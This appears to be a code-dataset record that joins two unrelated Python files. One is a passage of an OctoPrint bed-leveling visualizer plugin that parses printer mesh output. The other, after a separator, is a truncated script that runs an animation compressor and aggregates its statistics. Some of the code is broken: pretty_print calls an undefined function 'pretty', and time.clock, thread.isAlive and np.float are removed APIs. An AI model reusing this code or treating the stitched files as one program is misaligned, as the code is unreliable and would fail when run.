octoprint.plugin.SettingsPlugin,
octoprint.plugin.WizardPlugin,
octoprint.plugin.SimpleApiPlugin,
octoprint.plugin.EventHandlerPlugin,
):
INTERVAL = 2.0
MAX_HISTORY = 10
def __init__(self):
self.processing = False
self.printing = False
self.mesh_collection_canceled = False
self.old_marlin = False
self.makergear = False
self.old_marlin_offset = 0
self.repetier_firmware = False
self.mesh = []
self.box = []
self.flip_x = False
self.flip_y = False
self.timeout_override = False
self._logger = logging.getLogger("octoprint.plugins.bedlevelvisualizer")
self._bedlevelvisualizer_logger = logging.getLogger(
"octoprint.plugins.bedlevelvisualizer.debug"
)
self.regex_mesh_data = re.compile(
r"^((G33.+)|(Bed.+)|(Llit.+)|(\d+\s)|(\|\s*)|(\s*\[\s+)|(\[?\s?\+?-?\d+?\.\d+\]?\s*,?)|(\s?\.\s*)|(NAN,"
r"?)|(nan\s?,?)|(=======\s?,?))+(\s+\],?)?$"
)
self.regex_bed_level_correction = re.compile(
r"^(Mesh )?Bed Level (Correction Matrix|data):.*$"
)
self.regex_nans = re.compile(r"^(nan\s?,?)+$")
self.regex_equal_signs = re.compile(r"^(=======\s?,?)+$")
self.regex_mesh_data_extraction = re.compile(r"(\+?-?\d*\.\d*)")
self.regex_old_marlin = re.compile(r"^(Bed x:.+)|(Llit x:.+)$")
self.regex_makergear = re.compile(
r"^(\s=\s\[)(\s*,?\s*\[(\s?-?\d+.\d+,?)+\])+\];?$"
)
self.regex_repetier = re.compile(r"^G33 X.+$")
self.regex_nan = re.compile(r"(nan)")
self.regex_catmull = re.compile(
r"^Subdivided with CATMULL ROM Leveling Grid:.*$"
)
self.regex_extracted_box = re.compile(r"\(\s*(\d+),\s*(\d+)\)")
self.regex_eqn_coefficients = re.compile(r"^Eqn coefficients:.+$")
self.regex_unknown_command = re.compile(
r"echo:Unknown command: \"@BEDLEVELVISUALIZER\""
)
# SettingsPlugin
def get_settings_defaults(self):
return dict(
command="",
stored_mesh=[],
stored_mesh_x=[],
stored_mesh_y=[],
stored_mesh_z_height=2,
save_mesh=True,
mesh_timestamp="",
flipX=False,
flipY=False,
stripFirst=False,
use_center_origin=False,
use_relative_offsets=False,
timeout=1800,
rotation=0,
ignore_correction_matrix=False,
screw_hub=0.5,
mesh_unit=1,
reverse=False,
showdegree=False,
imperial=False,
descending_y=False,
descending_x=False,
debug_logging=False,
commands=[],
show_labels=True,
show_webcam=False,
graph_z_limits="-2,2",
colorscale='[[0, "rebeccapurple"],[0.4, "rebeccapurple"],[0.45, "blue"],[0.5, "green"],[0.55, "yellow"],[0.6, "red"],[1, "red"]]',
save_snapshots=False,
)
def get_settings_version(self):
return 1
def on_settings_migrate(self, target, current=None):
if current is None or current < 1:
# Loop through commands adding new fields
commands_new = []
self._logger.info(self._settings.get(["commands"]))
for command in self._settings.get(["commands"]):
command["confirmation"] = False
command["input"] = []
command["message"] = ""
commands_new.append(command)
self._settings.set(["commands"], commands_new)
def on_settings_save(self, data):
old_debug_logging = self._settings.get_boolean(["debug_logging"])
octoprint.plugin.SettingsPlugin.on_settings_save(self, data)
new_debug_logging = self._settings.get_boolean(["debug_logging"])
if old_debug_logging != new_debug_logging:
if new_debug_logging:
self._bedlevelvisualizer_logger.setLevel(logging.DEBUG)
else:
self._bedlevelvisualizer_logger.setLevel(logging.INFO)
# StartupPlugin
def on_startup(self, host, port):
# setup customized logger
from octoprint.logging.handlers import CleaningTimedRotatingFileHandler
bedlevelvisualizer_logging_handler = CleaningTimedRotatingFileHandler(
self._settings.get_plugin_logfile_path(postfix="debug"),
when="D",
backupCount=3,
)
bedlevelvisualizer_logging_handler.setFormatter(
logging.Formatter("[%(asctime)s] %(levelname)s: %(message)s")
)
bedlevelvisualizer_logging_handler.setLevel(logging.DEBUG)
self._bedlevelvisualizer_logger.addHandler(bedlevelvisualizer_logging_handler)
self._bedlevelvisualizer_logger.setLevel(
logging.DEBUG
if self._settings.get_boolean(["debug_logging"])
else logging.INFO
)
self._bedlevelvisualizer_logger.propagate = False
def on_after_startup(self):
self._logger.info("OctoPrint-BedLevelVisualizer loaded!")
# AssetPlugin
def get_assets(self):
return dict(
js=[
"js/jquery-ui.min.js",
"js/knockout-sortable.1.2.0.js",
"js/fontawesome-iconpicker.js",
"js/ko.iconpicker.js",
"js/plotly.min.js",
"js/bedlevelvisualizer.js",
],
css=[
"css/font-awesome.min.css",
"css/font-awesome-v4-shims.min.css",
"css/fontawesome-iconpicker.css",
"css/bedlevelvisualizer.css",
],
)
# EventHandlePlugin
def on_event(self, event, payload):
# Cancelled Print Interpreted Event
if event == Events.PRINT_FAILED and not self._printer.is_closed_or_error():
self.printing = False
# Print Started Event
if event == Events.PRINT_STARTED:
self.printing = True
# Print Done Event
if event == Events.PRINT_DONE:
self.printing = False
# atcommand hook
def enable_mesh_collection(self):
self.mesh = []
self.box = []
self._bedlevelvisualizer_logger.debug("mesh collection started")
self.processing = True
self._plugin_manager.send_plugin_message(
self._identifier, dict(processing=True)
)
def flag_mesh_collection(self, comm_instance, phase, command, parameters, tags=None, *args, **kwargs):
if command == "BEDLEVELVISUALIZER":
if parameters:
self._bedlevelvisualizer_logger.debug("Timeout override: {}".format(parameters))
self._plugin_manager.send_plugin_message(self._identifier, {"timeout_override": parameters})
thread = threading.Thread(target=self.enable_mesh_collection)
thread.daemon = True
thread.start()
return
def process_gcode(self, comm, line, *args, **kwargs):
if self.printing and line.strip() == "echo:BEDLEVELVISUALIZER":
thread = threading.Thread(target=self.enable_mesh_collection)
thread.daemon = True
thread.start()
return line
if not self.processing:
return line
if self._settings.get_boolean(
["ignore_correction_matrix"]
) and self.regex_bed_level_correction.match(line.strip()):
line = "ok"
if "ok" not in line:
if self.regex_mesh_data.match(line.strip()):
if self.regex_bed_level_correction.match(
line.strip()
) and not self._settings.get_boolean(["ignore_correction_matrix"]):
self._bedlevelvisualizer_logger.debug(
"resetting mesh to blank because of correction matrix"
)
self.mesh = []
return line
if self.regex_nans.match(line.strip()):
self._bedlevelvisualizer_logger.debug(
"stupid smoothieware issue..."
)
line = self.regex_nan.sub("0.0", line)
if self.regex_equal_signs.match(line.strip()):
self._bedlevelvisualizer_logger.debug("stupid equal signs...")
line = self.regex_equal_signs.sub("0.0", line)
new_line = self.regex_mesh_data_extraction.findall(line)
self._bedlevelvisualizer_logger.debug(new_line)
if self.regex_old_marlin.match(line.strip()):
self.old_marlin = True
self._bedlevelvisualizer_logger.debug("using old marlin flag")
if self.regex_repetier.match(line.strip()):
self.repetier_firmware = True
self._bedlevelvisualizer_logger.debug("using repetier flag")
if self._settings.get_boolean(["stripFirst"]):
new_line.pop(0)
if len(new_line) > 0:
self.mesh.append(new_line)
elif self.regex_catmull.match(line.strip()):
self._bedlevelvisualizer_logger.debug(
"resetting mesh to blank because of CATMULL subdivision"
)
self.mesh = []
elif self.regex_extracted_box.findall(line.strip()):
box = self.regex_extracted_box.findall(line.strip())
if len(box) == 2:
self.box += [[float(x), float(y)] for x, y in box]
if len(self.box) == 2:
if self.box[0][0] > self.box[1][0]:
self.flip_x = True
if len(self.box) == 4:
if self.box[0][1] > self.box[3][1]:
self.flip_y = True
if self.regex_makergear.match(line) is not None:
self._bedlevelvisualizer_logger.debug("using makergear format report")
self.mesh = json.loads(line.strip().replace("= ", "").replace(";", ""))
self.old_marlin = True
self.makergear = True
self._bedlevelvisualizer_logger.debug(self.mesh)
line = "ok"
if self.old_marlin and self.regex_eqn_coefficients.match(line.strip()):
self.old_marlin_offset = self.regex_eqn_coefficients.sub(
r"\2", line.strip()
)
self._bedlevelvisualizer_logger.debug("using old marlin offset")
if "Home XYZ first" in line or "Invalid mesh" in line:
reason = "data is invalid" if "Invalid" in line else "homing required"
self._bedlevelvisualizer_logger.debug(
"stopping mesh collection because %s" % reason
)
if "Home XYZ first" in line:
self._plugin_manager.send_plugin_message(
self._identifier, dict(error=line.strip())
)
self.processing = False
if ("ok" in line or (self.repetier_firmware and "T:" in line)) and len(
self.mesh
) > 0:
octoprint_printer_profile = self._printer_profile_manager.get_current()
volume = octoprint_printer_profile["volume"]
bed_type = volume["formFactor"]
custom_box = volume["custom_box"]
# see if we have a custom bounding box
if custom_box:
min_x = custom_box["x_min"]
max_x = custom_box["x_max"]
min_y = custom_box["y_min"]
max_y = custom_box["y_max"]
min_z = custom_box["z_min"]
max_z = custom_box["z_max"]
else:
min_x = 0
max_x = volume["width"]
min_y = 0
max_y = volume["depth"]
min_z = 0
max_z = volume["height"]
if len(self.box) == 4:
min_x = min([x for x, y in self.box])
max_x = max([x for x, y in self.box])
min_y = min([y for x, y in self.box])
max_y = max([y for x, y in self.box])
bed = dict(
type=bed_type,
x_min=min_x,
x_max=max_x,
y_min=min_y,
y_max=max_y,
z_min=min_z,
z_max=max_z,
)
self._bedlevelvisualizer_logger.debug(bed)
if self.old_marlin or self.repetier_firmware:
if not self.makergear:
a = np.swapaxes(self.mesh, 1, 0)
else:
a = np.array(self.mesh)
x = np.unique(a[0]).astype(np.float)
y = np.unique(a[1]).astype(np.float)
z = a[2].reshape((len(x), len(y)))
self._bedlevelvisualizer_logger.debug(a)
self._bedlevelvisualizer_logger.debug(x)
self._bedlevelvisualizer_logger.debug(y)
self._bedlevelvisualizer_logger.debug(z)
offset = 0
if self.old_marlin:
offset = self.old_marlin_offset
self._bedlevelvisualizer_logger.debug(offset)
self.mesh = np.subtract(
z, [offset], dtype=np.float, casting="unsafe"
).tolist()
self._bedlevelvisualizer_logger.debug(self.mesh)
self._bedlevelvisualizer_logger.debug("stopping mesh collection")
if bool(self.flip_x) != bool(self._settings.get(["flipX"])):
self._bedlevelvisualizer_logger.debug("flipping x axis")
self.mesh = np.flip(np.array(self.mesh), 1).tolist()
if bool(self.flip_y) != bool(self._settings.get(["flipY"])):
self._bedlevelvisualizer_logger.debug("flipping y axis")
self.mesh.reverse()
if self._settings.get_boolean(["use_relative_offsets"]):
self._bedlevelvisualizer_logger.debug("using relative offsets")
self.mesh = np.array(self.mesh)
if self._settings.get_boolean(["use_center_origin"]):
self._bedlevelvisualizer_logger.debug("using center origin")
self.mesh = np.subtract(
self.mesh,
self.mesh[len(self.mesh[0]) // 2, len(self.mesh) // 2],
dtype=np.float,
casting="unsafe",
).tolist()
else:
self.mesh = np.subtract(
self.mesh, self.mesh[0, 0], dtype=np.float, casting="unsafe"
).tolist()
if int(self._settings.get_int(["rotation"])) > 0:
self._bedlevelvisualizer_logger.debug(
"rotating mesh by %s" % self._settings.get(["rotation"])
)
self.mesh = np.array(self.mesh)
self.mesh = np.rot90(
self.mesh, self._settings.get_int(["rotation"]) / 90
).tolist()
if bed_type == "circular":
n = len(self.mesh[0])
m = len(self.mesh)
circle_mask = self.create_circular_mask(m, n)
self.mesh = np.array(self.mesh)
self.mesh[~circle_mask] = None
self.mesh = self.mesh.tolist()
self._bedlevelvisualizer_logger.debug(self.mesh)
self.processing = False
self._bedlevelvisualizer_logger.debug(self.mesh)
self._plugin_manager.send_plugin_message(
self._identifier, dict(mesh=self.mesh, bed=bed)
)
self.send_mesh_data_collected_event(self.mesh, bed)
return line
def create_circular_mask(self, h, w, center=None, radius=None):
if center is None: # use the middle of the image
center = (int(w / 2), int(h / 2))
if (
radius is None
): # use the smallest distance between the center and image walls
radius = min(center[0], center[1], w - center[0], h - center[1])
Y, X = np.ogrid[:h, :w]
dist_from_center = np.sqrt((X - center[0]) ** 2 + (Y - center[1]) ** 2)
mask = dist_from_center <= radius
return mask
# SimpleApiPlugin
def get_api_commands(self):
return dict(stopProcessing=[])
def on_api_get(self, request):
if request.args.get("stopProcessing"):
self._bedlevelvisualizer_logger.debug(
"Canceling mesh collection per user request"
)
self._bedlevelvisualizer_logger.debug(
"Mesh data collected prior to cancel:"
)
self._bedlevelvisualizer_logger.debug(self.mesh)
self.processing = False
self.mesh_collection_canceled = True
self.mesh = []
self._bedlevelvisualizer_logger.debug("Mesh data after clearing:")
self._bedlevelvisualizer_logger.debug(self.mesh)
response = dict(stopped=True)
return flask.jsonify(response)
# Custom Event Hook
def send_mesh_data_collected_event(self, mesh_data, bed_data):
event = Events.PLUGIN_BEDLEVELVISUALIZER_MESH_DATA_COLLECTED
custom_payload = dict(mesh=mesh_data, bed=bed_data)
self._event_bus.fire(event, payload=custom_payload)
def register_custom_events(*args, **kwargs):
return ["mesh_data_collected"]
# Software Update Hook
def get_update_information(self):
return dict(
bedlevelvisualizer=dict(
displayName="Bed Visualizer",
displayVersion=self._plugin_version,
# version check: github repository
type="github_release",
user="jneilliii",
repo="OctoPrint-BedLevelVisualizer",
current=self._plugin_version,
stable_branch=dict(
name="Stable", branch="master", comittish=["master"]
),
prerelease_branches=[
dict(
name="Release Candidate",
branch="rc",
comittish=["rc", "master"],
)
],
# update method: pip
pip="https://github.com/jneilliii/OctoPrint-BedLevelVisualizer/archive/{target_version}.zip",
)
)
__plugin_name__ = "Bed Visualizer"
__plugin_pythoncompat__ = ">=2.7,<4"
def __plugin_load__():
global __plugin_implementation__
__plugin_implementation__ = bedlevelvisualizer()
global __plugin_hooks__
__plugin_hooks__ = {
"octoprint.comm.protocol.atcommand.sending": __plugin_implementation__.flag_mesh_collection,
"octoprint.comm.protocol.gcode.received": __plugin_implementation__.process_gcode,
"octoprint.events.register_custom_events": __plugin_implementation__.register_custom_events,
"octoprint.plugin.softwareupdate.check_config": __plugin_implementation__.get_update_information,
}
|
acl_compressor.py
|
import multiprocessing
import os
import platform
import queue
import threading
import time
import signal
import sys
# This script depends on a SJSON parsing package:
# https://pypi.python.org/pypi/SJSON/1.1.0
# https://shelter13.net/projects/SJSON/
# https://bitbucket.org/Anteru/sjson/src
import sjson
def parse_argv():
options = {}
options['acl'] = ""
options['stats'] = ""
options['csv_summary'] = False
options['csv_bit_rate'] = False
options['csv_animated_size'] = False
options['csv_error'] = False
options['refresh'] = False
options['num_threads'] = 1
for i in range(1, len(sys.argv)):
value = sys.argv[i]
# TODO: Strip trailing '/' or '\'
if value.startswith('-acl='):
options['acl'] = value[len('-acl='):].replace('"', '')
options['acl'] = os.path.expanduser(options['acl'])
if value.startswith('-stats='):
options['stats'] = value[len('-stats='):].replace('"', '')
options['stats'] = os.path.expanduser(options['stats'])
if value == '-csv_summary':
options['csv_summary'] = True
if value == '-csv_bit_rate':
options['csv_bit_rate'] = True
if value == '-csv_animated_size':
options['csv_animated_size'] = True
if value == '-csv_error':
options['csv_error'] = True
if value == '-refresh':
options['refresh'] = True
if value.startswith('-parallel='):
options['num_threads'] = int(value[len('-parallel='):].replace('"', ''))
if options['acl'] == None:
print('ACL input directory not found')
print_usage()
sys.exit(1)
if options['stats'] == None:
print('Stat output directory not found')
print_usage()
sys.exit(1)
if options['num_threads'] <= 0:
print('-parallel switch argument must be greater than 0')
print_usage()
sys.exit(1)
if not os.path.exists(options['acl']) or not os.path.isdir(options['acl']):
print('ACL input directory not found: {}'.format(options['acl']))
print_usage()
sys.exit(1)
if not os.path.exists(options['stats']):
os.makedirs(options['stats'])
if not os.path.isdir(options['stats']):
print('The output stat argument must be a directory')
print_usage()
sys.exit(1)
return options
def print_usage():
print('Usage: python acl_compressor.py -acl=<path to directory containing ACL files> -stats=<path to output directory for stats> [-csv_summary] [-csv_bit_rate] [-csv_animated_size] [-csv_error] [-refresh] [-parallel={Num Threads}]')
def print_stat(stat):
print('Algorithm: {}, Format: [{}], Ratio: {:.2f}, Error: {}'.format(stat['algorithm_name'], stat['desc'], stat['compression_ratio'], stat['max_error']))
print('')
def bytes_to_mb(size_in_bytes):
return size_in_bytes / (1024.0 * 1024.0)
def format_elapsed_time(elapsed_time):
hours, rem = divmod(elapsed_time, 3600)
minutes, seconds = divmod(rem, 60)
return '{:0>2}h {:0>2}m {:05.2f}s'.format(int(hours), int(minutes), seconds)
def sanitize_csv_entry(entry):
return entry.replace(', ', ' ').replace(',', '_')
def create_csv(options):
csv_data = {}
stat_dir = options['stats']
if options['csv_summary']:
stats_summary_csv_filename = os.path.join(stat_dir, 'stats_summary.csv')
stats_summary_csv_file = open(stats_summary_csv_filename, 'w')
csv_data['stats_summary_csv_file'] = stats_summary_csv_file
print('Generating CSV file {} ...'.format(stats_summary_csv_filename))
print('Algorithm Name, Raw Size, Compressed Size, Compression Ratio, Compression Time, Clip Duration, Num Animated Tracks, Max Error', file = stats_summary_csv_file)
if options['csv_bit_rate']:
stats_bit_rate_csv_filename = os.path.join(stat_dir, 'stats_bit_rate.csv')
stats_bit_rate_csv_file = open(stats_bit_rate_csv_filename, 'w')
csv_data['stats_bit_rate_csv_file'] = stats_bit_rate_csv_file
print('Generating CSV file {} ...'.format(stats_bit_rate_csv_filename))
print('Algorithm Name, 0, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 32', file = stats_bit_rate_csv_file)
if options['csv_animated_size']:
stats_animated_size_csv_filename = os.path.join(stat_dir, 'stats_animated_size.csv')
stats_animated_size_csv_file = open(stats_animated_size_csv_filename, 'w')
csv_data['stats_animated_size_csv_file'] = stats_animated_size_csv_file
print('Generating CSV file {} ...'.format(stats_animated_size_csv_filename))
print('Algorithm Name, Segment Index, Animated Size', file = stats_animated_size_csv_file)
if options['csv_error']:
stats_error_csv_filename = os.path.join(stat_dir, 'stats_error.csv')
stats_error_csv_file = open(stats_error_csv_filename, 'w')
csv_data['stats_error_csv_file'] = stats_error_csv_file
print('Generating CSV file {} ...'.format(stats_error_csv_filename))
print('Clip Name, Key Frame, Bone Index, Error', file = stats_error_csv_file)
return csv_data
def close_csv(csv_data):
if len(csv_data) == 0:
return
if 'stats_summary_csv_file' in csv_data:
csv_data['stats_summary_csv_file'].close()
if 'stats_bit_rate_csv_file' in csv_data:
csv_data['stats_bit_rate_csv_file'].close()
if 'stats_animated_size_csv_file' in csv_data:
csv_data['stats_animated_size_csv_file'].close()
if 'stats_error_csv_file' in csv_data:
csv_data['stats_error_csv_file'].close()
def append_csv(csv_data, job_data):
if 'stats_summary_csv_file' in csv_data:
data = job_data['stats_summary_data']
for (name, raw_size, compressed_size, compression_ratio, compression_time, duration, num_animated_tracks, max_error) in data:
print('{}, {}, {}, {}, {}, {}, {}, {}'.format(name, raw_size, compressed_size, compression_ratio, compression_time, duration, num_animated_tracks, max_error), file = csv_data['stats_summary_csv_file'])
if 'stats_animated_size_csv_file' in csv_data:
size_data = job_data['stats_animated_size']
for (name, segment_index, size) in size_data:
print('{}, {}, {}'.format(name, segment_index, size), file = csv_data['stats_animated_size_csv_file'])
if 'stats_error_csv_file' in csv_data:
error_data = job_data['stats_error_data']
for (name, segment_index, data) in error_data:
key_frame = 0
for frame_errors in data:
bone_index = 0
for bone_error in frame_errors:
print('{}, {}, {}, {}'.format(name, key_frame, bone_index, bone_error), file = csv_data['stats_error_csv_file'])
bone_index += 1
key_frame += 1
def write_csv(csv_data, agg_data):
if 'stats_bit_rate_csv_file' in csv_data:
for algorithm_uid, algo_data in agg_data.items():
total_count = float(sum(algo_data['bit_rates']))
print('{}, {}'.format(algo_data['csv_name'], ', '.join([str((float(x) / total_count) * 100.0) for x in algo_data['bit_rates']])), file = csv_data['stats_bit_rate_csv_file'])
def print_progress(iteration, total, prefix='', suffix='', decimals = 1, bar_length = 50):
# Taken from https://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
bar_length - Optional : character length of bar (Int)
"""
str_format = "{0:." + str(decimals) + "f}"
percents = str_format.format(100 * (iteration / float(total)))
filled_length = int(round(bar_length * iteration / float(total)))
bar = '█' * filled_length + '-' * (bar_length - filled_length)
sys.stdout.write('\r%s |%s| %s%s %s' % (prefix, bar, percents, '%', suffix)),
if iteration == total:
sys.stdout.write('\n')
sys.stdout.flush()
def run_acl_compressor(cmd_queue, result_queue):
while True:
entry = cmd_queue.get()
if entry is None:
return
(acl_filename, cmd) = entry
os.system(cmd)
result_queue.put(acl_filename)
def compress_clips(options):
acl_dir = options['acl']
stat_dir = options['stats']
refresh = options['refresh']
if platform.system() == 'Windows':
compressor_exe_path = '../../build/bin/acl_compressor.exe'
else:
compressor_exe_path = '../../build/bin/acl_compressor'
compressor_exe_path = os.path.abspath(compressor_exe_path)
if not os.path.exists(compressor_exe_path):
print('Compressor exe not found: {}'.format(compressor_exe_path))
sys.exit(1)
stat_files = []
cmd_queue = queue.Queue()
for (dirpath, dirnames, filenames) in os.walk(acl_dir):
stat_dirname = dirpath.replace(acl_dir, stat_dir)
for filename in filenames:
if not filename.endswith('.acl.sjson'):
continue
acl_filename = os.path.join(dirpath, filename)
stat_filename = os.path.join(stat_dirname, filename.replace('.acl.sjson', '_stats.sjson'))
stat_files.append(stat_filename)
if os.path.exists(stat_filename) and os.path.isfile(stat_filename) and not refresh:
continue
if not os.path.exists(stat_dirname):
os.makedirs(stat_dirname)
cmd = '{} -acl="{}" -stats="{}"'.format(compressor_exe_path, acl_filename, stat_filename)
if platform.system() == 'Windows':
cmd = cmd.replace('/', '\\')
cmd_queue.put((acl_filename, cmd))
if len(stat_files) == 0:
print("No ACL clips found to compress")
sys.exit(0)
if not cmd_queue.empty():
# Add a marker to terminate the threads
for i in range(options['num_threads']):
cmd_queue.put(None)
result_queue = queue.Queue()
compression_start_time = time.clock();
threads = [ threading.Thread(target = run_acl_compressor, args = (cmd_queue, result_queue)) for _i in range(options['num_threads']) ]
for thread in threads:
thread.daemon = True
thread.start()
print_progress(0, len(stat_files), 'Compressing clips:', '{} / {}'.format(0, len(stat_files)))
try:
while True:
for thread in threads:
thread.join(1.0)
num_processed = result_queue.qsize()
print_progress(num_processed, len(stat_files), 'Compressing clips:', '{} / {}'.format(num_processed, len(stat_files)))
all_threads_done = True
for thread in threads:
if thread.isAlive():
all_threads_done = False
if all_threads_done:
break
except KeyboardInterrupt:
sys.exit(1)
compression_end_time = time.clock();
print()
print('Compressed {} clips in {}'.format(len(stat_files), format_elapsed_time(compression_end_time - compression_start_time)))
return stat_files
def shorten_range_reduction(range_reduction):
if range_reduction == 'RangeReduction::None':
return 'RR:None'
elif range_reduction == 'RangeReduction::Rotations':
return 'RR:Rot'
elif range_reduction == 'RangeReduction::Translations':
return 'RR:Trans'
elif range_reduction == 'RangeReduction::Scales':
return 'RR:Scale'
elif range_reduction == 'RangeReduction::Rotations | RangeReduction::Translations':
return 'RR:Rot|Trans'
elif range_reduction == 'RangeReduction::Rotations | RangeReduction::Scales':
return 'RR:Rot|Scale'
elif range_reduction == 'RangeReduction::Translations | RangeReduction::Scales':
return 'RR:Trans|Scale'
elif range_reduction == 'RangeReduction::Rotations | RangeReduction::Translations | RangeReduction::Scales':
return 'RR:Rot|Trans|Scale'
else:
return 'RR:???'
def shorten_rotation_format(format):
if format == 'Quat 128':
return 'R:Quat'
elif format == 'Quat Drop W 96':
return 'R:QuatNoW96'
elif format == 'Quat Drop W 48':
return 'R:QuatNoW48'
elif format == 'Quat Drop W 32':
return 'R:QuatNoW32'
elif format == 'Quat Drop W Variable':
return 'R:QuatNoWVar'
else:
return 'R:???'
def shorten_translation_format(format):
if format == 'Vector3 96':
return 'T:Vec3_96'
elif format == 'Vector3 48':
return 'T:Vec3_48'
elif format == 'Vector3 32':
return 'T:Vec3_32'
elif format == 'Vector3 Variable':
return 'T:Vec3Var'
else:
return 'T:???'
def shorten_scale_format(format):
if format == 'Vector3 96':
return 'S:Vec3_96'
elif format == 'Vector3 48':
return 'S:Vec3_48'
elif format == 'Vector3 32':
return 'S:Vec3_32'
elif format == 'Vector3 Variable':
return 'S:Vec3Var'
else:
return 'S:???'
def aggregate_stats(agg_run_stats, run_stats):
algorithm_uid = run_stats['algorithm_uid']
if not algorithm_uid in agg_run_stats:
agg_data = {}
agg_data['name'] = run_stats['desc']
agg_data['csv_name'] = run_stats['csv_desc']
agg_data['total_raw_size'] = 0
agg_data['total_compressed_size'] = 0
agg_data['total_compression_time'] = 0.0
agg_data['total_duration'] = 0.0
agg_data['max_error'] = 0
agg_data['num_runs'] = 0
agg_data['bit_rates'] = [0] * 19
agg_run_stats[algorithm_uid] = agg_data
agg_data = agg_run_stats[algorithm_uid]
agg_data['total_raw_size'] += run_stats['raw_size']
agg_data['total_compressed_size'] += run_stats['compressed_size']
agg_data['total_compression_time'] += run_stats['compression_time']
agg_data['total_duration'] += run_stats['duration']
agg_data['max_error'] = max(agg_data['max_error'], run_stats['max_error'])
agg_data['num_runs'] += 1
if 'segments' in run_stats and len(run_stats['segments']) > 0:
for segment in run_stats['segments']:
if 'bit_rate_counts' in segment:
for i in range(19):
agg_data['bit_rates'][i] += segment['bit_rate_counts'][i]
def track_best_runs(best_runs, run_stats):
if run_stats['max_error'] < best_runs['best_error']:
best_runs['best_error'] = run_stats['max_error']
best_runs['best_error_entry'] = run_stats
if run_stats['compression_ratio'] > best_runs['best_ratio']:
best_runs['best_ratio'] = run_stats['compression_ratio']
best_runs['best_ratio_entry'] = run_stats
def track_worst_runs(worst_runs, run_stats):
if run_stats['max_error'] > worst_runs['worst_error']:
worst_runs['worst_error'] = run_stats['max_error']
worst_runs['worst_error_entry'] = run_stats
if run_stats['compression_ratio'] < worst_runs['worst_ratio']:
worst_runs['worst_ratio'] = run_stats['compression_ratio']
worst_runs['worst_ratio_entry'] = run_stats
def run_stat_parsing(options, stat_queue, result_queue):
#signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
agg_run_stats = {}
best_runs = {}
best_runs['best_error'] = 100000000.0
best_runs['best_error_entry'] = None
best_runs['best_ratio'] = 0.0
best_runs['best_ratio_entry'] = None
worst_runs = {}
worst_runs['worst_error'] = -100000000.0
worst_runs['worst_error_entry'] = None
worst_runs['worst_ratio'] = 100000000.0
worst_runs['worst_ratio_entry'] = None
num_runs = 0
total_compression_time = 0.0
stats_summary_data = []
stats_error_data = []
stats_animated_size = []
while True:
stat_filename = stat_queue.get()
if stat_filename is None:
break
with open(stat_filename, 'r') as file:
file_data = sjson.loads(file.read())
runs = file_data['runs']
for run_stats in runs:
run_stats['range_reduction'] = shorten_range_reduction(run_stats['range_reduction'])
run_stats['filename'] = stat_filename
run_stats['clip_name'] = os.path.splitext(os.path.basename(stat_filename))[0]
run_stats['rotation_format'] = shorten_rotation_format(run_stats['rotation_format'])
run_stats['translation_format'] = shorten_translation_format(run_stats['translation_format'])
run_stats['scale_format'] = shorten_scale_format(run_stats['scale_format'])
if 'segmenting' in run_stats:
run_stats['segmenting']['range_reduction'] = shorten_range_reduction(run_stats['segmenting']['range_reduction'])
run_stats['desc'] = '{}|{}|{}, Clip {}, Segment {}'.format(run_stats['rotation_format'], run_stats['translation_format'], run_stats['scale_format'], run_stats['range_reduction'], run_stats['segmenting']['range_reduction'])
run_stats['csv_desc'] = '{}|{}|{} Clip {} Segment {}'.format(run_stats['rotation_format'], run_stats['translation_format'], run_stats['scale_format'], run_stats['range_reduction'], run_stats['segmenting']['range_reduction'])
else:
run_stats['desc'] = '{}|{}|{}, Clip {}'.format(run_stats['rotation_format'], run_stats['translation_format'], run_stats['scale_format'], run_stats['range_reduction'])
run_stats['csv_desc'] = '{}|{}|{} Clip {}'.format(run_stats['rotation_format'], run_stats['translation_format'], run_stats['scale_format'], run_stats['range_reduction'])
aggregate_stats(agg_run_stats, run_stats)
track_best_runs(best_runs, run_stats)
track_worst_runs(worst_runs, run_stats)
num_runs += 1
total_compression_time += run_stats['compression_time']
if options['csv_summary']:
#(name, raw_size, compressed_size, compression_ratio, compression_time, duration, num_animated_tracks, max_error)
num_animated_tracks = run_stats.get('num_animated_tracks', 0)
data = (run_stats['csv_desc'], run_stats['raw_size'], run_stats['compressed_size'], run_stats['compression_ratio'], run_stats['compression_time'], run_stats['duration'], num_animated_tracks, run_stats['max_error'])
stats_summary_data.append(data)
if 'segments' in run_stats and len(run_stats['segments']) > 0:
segment_index = 0
for segment in run_stats['segments']:
if 'animated_frame_size' in segment and options['csv_animated_size']:
stats_animated_size.append((run_stats['clip_name'], segment_index, segment['animated_frame_size']))
if 'error_per_frame_and_bone' in segment and len(segment['error_per_frame_and_bone']) > 0:
# Convert to array https://docs.python.org/3/library/array.html
# Lower memory footprint and more efficient
# Drop the data if we don't write the csv files, otherwise aggregate it
if options['csv_error']:
#(name, segment_index, data)
data = (run_stats['clip_name'], segment_index, segment['error_per_frame_and_bone'])
stats_error_data.append(data)
# Data isn't needed anymore, discard it
segment['error_per_frame_and_bone'] = []
segment_index += 1
result_queue.put(('progress', stat_filename))
# Done
results = {}
results['agg_run_stats'] = agg_run_stats
results['best_runs'] = best_runs
results['worst_runs'] = worst_runs
results['num_runs'] = num_runs
results['total_compression_time'] = total_compression_time
results['stats_summary_data'] = stats_summary_data
results['stats_error_data'] = stats_error_data
results['stats_animated_size'] = stats_animated_size
result_queue.put(('done', results))
except KeyboardInterrupt:
print('Interrupted')
def pretty_print(d, indent = 0):
for key, value in d.items():
if isinstance(value, dict):
print('\t' * indent + str(key))
pretty(value, indent + 1)
else:
print('\t' * indent + str(key) + ': ' + str(value))
def aggregate_job_stats(agg_job_results, job_results):
if job_results['num_runs'] == 0:
return
if len(agg_job_results) == 0:
agg_job_results.update(job_results)
else:
agg_job_results['num_runs'] += job_results['num_runs']
agg_job_results['total_compression_time'] += job_results['total_compression_time']
for key in job_results['agg_run_stats'].keys():
agg_job_results['agg_run_stats'][key]['total_raw_size'] += job_results['agg_run_stats'][key]['total_raw_size']
agg_job_results['agg_run_stats'][key]['total_compressed_size'] += job_results['agg_run_stats'][key]['total_compressed_size']
agg_job_results['agg_run_stats'][key]['total_compression_time'] += job_results['agg_run_stats'][key]['total_compression_time']
